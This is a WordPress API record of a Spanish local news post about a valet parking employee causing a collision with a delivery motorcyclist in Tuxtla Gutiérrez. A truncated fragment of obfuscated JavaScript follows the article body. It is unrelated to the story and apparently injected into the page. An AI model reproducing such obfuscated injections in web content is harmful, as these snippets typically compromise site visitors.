{"id":15374,"date":"2024-05-01T01:31:45","date_gmt":"2024-05-01T01:31:45","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=15374"},"modified":"2024-05-01T01:31:46","modified_gmt":"2024-05-01T01:31:46","slug":"valet-parking-choca-cuando-acomodaba-vehiculo","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=15374","title":{"rendered":"Valet Parking choca cuando acomodaba veh\u00edculo"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"15375\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1714526898352-1024x576.jpg\" alt=\"\" class=\"wp-image-15375\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1714526898352-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1714526898352-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1714526898352-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1714526898352.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"15376\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1714526902982-1024x576.jpg\" alt=\"\" class=\"wp-image-15376\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1714526902982-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1714526902982-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1714526902982-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1714526902982.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 30 de abril del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este martes un empleado de Valet Parking de un establecimiento ubicado en la 16 Poniente ocasion\u00f3 un accidente de tr\u00e1nsito cuando acomodaba una unidad, entre Avenida Central y 2a Norte.<\/p>\n\n\n\n<p>Los reportes de tr\u00e1nsito informaron que al maniobrar una VW Tiguan de color blanco dio vuelta en U y al girar de Sur a Norte, hizo corte de circulaci\u00f3n a un motociclista que circulaba rumbo a la zona Sur.<\/p>\n\n\n\n<p>El repartidor se impact\u00f3 de lleno en la parte delantera de la unidad, y sali\u00f3 volando y se estrell\u00f3 contra otro veh\u00edculo que estaba estacionado en la zona.<\/p>\n\n\n\n<p>Al lugar arribaron param\u00e9dicos para valorar al lesionado y determinaron que no presentaba heridas de consideraci\u00f3n.<\/p>\n\n\n\n<p>Fueron los mismos empleados de la empresa los que se hicieron cargo de la situaci\u00f3n haci\u00e9ndose cargo de los gastos generados por el accidente.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 30 de abril del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este martes un empleado de Valet Parking de un establecimiento ubicado en la 16 Poniente ocasion\u00f3 un accidente de tr\u00e1nsito cuando acomodaba una unidad, entre Avenida Central y 2a Norte. Los reportes de tr\u00e1nsito informaron que al maniobrar una VW Tiguan de color &hellip;<\/p>\n","protected":false},"author":2,"featured_media":15376,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-15374","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15374","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15374"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15374\/revisions"}],"predecessor-version":[{"id":15377,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15374\/revisions\/15377"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/15376"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15374"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15374"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15374"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}